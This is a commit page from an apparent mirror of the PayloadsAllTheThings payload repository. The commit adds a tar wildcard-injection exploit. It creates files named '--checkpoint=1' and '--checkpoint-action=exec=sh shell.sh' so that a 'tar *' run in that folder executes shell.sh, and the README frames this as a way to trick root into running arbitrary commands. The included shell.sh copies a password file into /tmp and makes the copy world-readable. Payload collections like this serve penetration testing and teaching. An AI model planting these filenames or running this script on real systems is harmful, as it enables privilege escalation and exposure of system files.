daffainfo
/
PayloadsAllTheThings
mirror of https://github.com/daffainfo/PayloadsAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Tar command exec

patch-1
swisskyrepo 2016-10-18 18:36:18 +07:00
parent 22b68979b4
commit bed3967509
5 changed files with 14 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -1,11 +1,9 @@
# Payloads All The Things
A list of every usefull payloads and bypass for Web Application Security
A list of usefull payloads and bypasses for Web Application Security
TODO:
* XSS
* Upload
* Traversal Directory
* Tar
* PHP Serialization
* CSV Injection
@ -14,5 +12,7 @@ To improve:
* SQL injection
* XXE
* SSRF
* Upload
* Tar command exec
# /!\ Work in Progress : 1%

0
TAR_Code_Exec/--checkpoint-action=exec=sh shell.sh Executable file
View File

0
TAR_Code_Exec/--checkpoint=1 Executable file
View File

14
TAR_Code_Exec/README.md
View File

@ -1,12 +1,14 @@
# Title
Lorem
# TAR Command Execution
By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and thats where the wildcard comes in handy.
## Vuln
## Exploit
These files work against a "tar *"
```
Code
--checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh (your exploit code is here)
```
## Thanks to
* Lorem
* Ipsum
*

3
TAR_Code_Exec/shell.sh Executable file
View File

@ -0,0 +1,3 @@
#!/bin/bash
cat /passwd > /tmp/flag
chmod 777 /tmp/flag